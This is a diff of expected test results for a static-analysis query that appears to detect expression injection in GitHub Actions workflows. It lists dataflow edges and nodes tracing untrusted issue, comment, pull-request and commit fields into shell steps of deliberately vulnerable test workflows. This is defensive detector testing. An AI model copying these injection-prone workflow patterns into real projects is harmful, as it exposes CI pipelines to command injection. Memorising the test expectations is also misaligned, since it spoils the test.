.github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses 
Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... 
tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... 
laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... 
ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | 
semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... 
tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... 
age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... 
ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | 
github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | 
github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| 
.github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... 
test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo 